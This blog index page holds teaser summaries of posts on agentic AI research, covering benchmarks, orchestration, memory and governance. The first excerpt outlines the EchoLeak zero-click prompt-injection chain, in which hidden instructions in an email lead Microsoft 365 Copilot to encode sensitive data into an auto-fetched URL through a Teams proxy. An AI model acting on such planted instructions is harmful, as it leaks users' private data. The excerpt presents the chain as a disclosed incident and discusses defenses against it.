Cover image

Echoes Without Clicks: How EchoLeak Turned Copilot Into a Data Drip

Prompt injection just graduated from theory to incident response. EchoLeak (CVE‑2025‑32711) demonstrated a zero‑click exfiltration chain inside Microsoft 365 Copilot: a single crafted external email seeded hidden instructions; Copilot later pulled that message into context, encoded sensitive details into a URL, and the client auto‑fetched the link—leaking data without the user clicking anything. The final twist: a CSP‑allowed Teams proxy retrieved the attacker’s URL on Copilot’s behalf. Below I unpack why standard defenses failed, and what an enterprise‑ready fix looks like. ...

September 20, 2025 · 5 min · Zelina
Cover image

Org Charts for Robots: What AgentArch Really Tells Us About Enterprise AI

If you’ve ever tried turning a clever chatbot into a reliable employee, you already know the pain: great demos, shaky delivery. AgentArch, a new enterprise-focused benchmark from ServiceNow, is the first study I’ve seen that tests combinations of agent design choices—single vs multi‑agent, ReAct vs function-calling, summary vs complete memory, and optional “thinking tools”—across two realistic workflows: a simple PTO process and a gnarly customer‑request router. The result is a cold shower for one‑size‑fits‑all playbooks—and a practical map for building systems that actually ship. ...

September 20, 2025 · 4 min · Zelina
Cover image

Right Tool, Right Thought: Difficulty-Aware Orchestration for Agentic LLMs

The punchline Static multi‑agent pipelines are expensive on easy questions and underpowered on hard ones. DAAO (Difficulty‑Aware Agentic Orchestration) proposes a controller that first estimates the difficulty of each query, then composes a workflow (operators like CoT, ReAct, Multi‑Agent Debate, Review/Ensemble) and finally routes each operator to the most suitable model in a heterogeneous LLM pool. The result: higher accuracy and lower cost on suite benchmarks. Why this matters (business lens) Spend less on routine queries. Easy tickets don’t need five agents and GPT‑Ultra—DAAO keeps them shallow and cheap. Don’t whiff on the edge cases. When the question is gnarly, DAAO deepens the DAG and upgrades the models only where it pays. Procurement leverage. Mixing open‑weights (Llama/Qwen) with commercial APIs lets you arbitrage price–performance per step. What DAAO actually does DAAO is three tightly coupled decisions per query: ...

September 20, 2025 · 4 min · Zelina
Cover image

Fork, Fuse, and Rule: XAgents’ Multipolar Playbook for Safer Multi‑Agent AI

TL;DR XAgents pairs a multipolar task graph (diverge with SIMO, converge with MISO) with IF‑THEN rule guards to plan uncertain tasks and suppress hallucinations. In benchmarks spanning knowledge and logic QA, it outperforms SPP, AutoAgents, TDAG, and AgentNet while using ~29% fewer tokens and ~45% less memory than AgentNet on a representative task. For operators, the practical win is a recipe to encode SOPs as rules on top of agent teams—without giving up adaptability. ...

September 19, 2025 · 4 min · Zelina
Cover image

From DAGs to Swarms: The Quiet Revolution of Agentic Workflows

TL;DR Traditional workflow managers treat science as a frozen DAG; the agentic era treats it as a living state machine that learns, optimizes, and—at scale—swarms. The payoff isn’t just speed. It’s a shift from execution pipelines to discovery loops, where hypotheses are generated, tested, and replanned continuously across labs, clouds, and HPC. Why this matters (beyond the lab) Enterprises keep wiring LLMs into point solutions and call it “automation.” Science, under stricter constraints (traceability, causality, irreversibility), is sketching a federated architecture where reasoning agents, facilities, and data fabrics negotiate in real time. If it works in a beamline, it’ll work in your back office. The blueprint is a reusable pattern for any AI-powered operation that must be auditable, distributed, and adaptive. ...

September 19, 2025 · 5 min · Zelina
Cover image

Sandboxes & Ladders: How to Build a Steerable Agent Economy

If AI agents become the economy’s new workforce, what keeps their markets from melting into ours like solder—fast, hot, and hard to undo? DeepMind’s “Virtual Agent Economies” proposes a practical map (and a modest constitution) for that future: treat agent markets as sandboxes and tune their permeability to the human economy. Once you see permeability as the policy lever, the rest of the architecture falls into place: auctions to resolve clashes, mission-led markets to direct effort, and identity rails so agents can be trusted, priced, and sanctioned. ...

September 19, 2025 · 6 min · Zelina
Cover image

Terms of Engagement: Building Trustworthy AI Agents Before They Build Us

As agentic AI moves from flashy demos to day‑to‑day operations—handling renewals, filing tickets, triaging inboxes, even buying things—the question is no longer can we automate judgment, but on what terms. This isn’t ethics-as-window‑dressing. Agent systems perceive, decide, and act through real interfaces (email, bank APIs, code repos). They can help—or hurt—at machine speed. Today I’ll argue three things: Alignment must shift from “answer quality” to action quality. Social agents change the duty of care developers and companies owe to users. We need a governance stack for multi‑agent ecosystems, not one‑off checklists. The discussion is grounded in the Nature piece by Gabriel, Keeling, Manzini, and Evans (2025), but tuned for operators shipping products this quarter—not a hypothetical future. ...

September 19, 2025 · 5 min · Zelina
Cover image

Tool Wars, Protocol Peace: What MCP‑AgentBench Really Measures

TL;DR MCP‑AgentBench is the first broad benchmark that evaluates language agents inside the Model Context Protocol (MCP) rather than with ad‑hoc function calls. It sets up 33 MCP servers with 188 tools and runs 600 goal‑oriented queries across six task patterns. Results flip a few assumptions: open‑source leaders (notably Qwen3‑235B‑A22B) can top the table under the ReAct style, while Claude 4 Sonnet shines with native tool‑calling. Token budgets matter: o3‑mini posts the best performance‑per‑token among big names. The meta‑lesson for builders: your agent’s interaction style must match the model and benchmarks must reward outcome, not ritual. ...

September 19, 2025 · 5 min · Zelina
Cover image

Branching Out of the Box: Tree‑OPO Turns MCTS Traces into Better RL for Reasoning

The punchline Tree‑OPO takes something many labs already produce—MCTS rollouts from a stronger teacher—and treats them not just as answers but as a curriculum of prefixes. It then optimizes a student with GRPO-like updates, but with staged, tree-aware advantages instead of a flat group mean. The result in math reasoning (GSM8K) is a modest but consistent bump over standard GRPO while keeping memory/complexity low. Why this matters for practitioners: you can get more out of your expensive searches (or teacher traces) without training a value model or lugging around teacher logits during student training. ...

September 17, 2025 · 5 min · Zelina
Cover image

Memory That Fights Back: How SEDM Turns Agent Logs into Verified Knowledge

TL;DR Most “agent memory” is a junk drawer: it grows fast, gets noisy, and slows everything down. SEDM (Self‑Evolving Distributed Memory) proposes an auditable, efficiency‑first overhaul. It verifies each candidate memory by replaying the exact run in a Self‑Contained Execution Context (SCEC), assigns an initial utility‑aligned weight, and then self‑schedules what to retrieve next. The result: higher task accuracy with fewer tokens versus strong memory baselines on FEVER and HotpotQA. ...

September 17, 2025 · 5 min · Zelina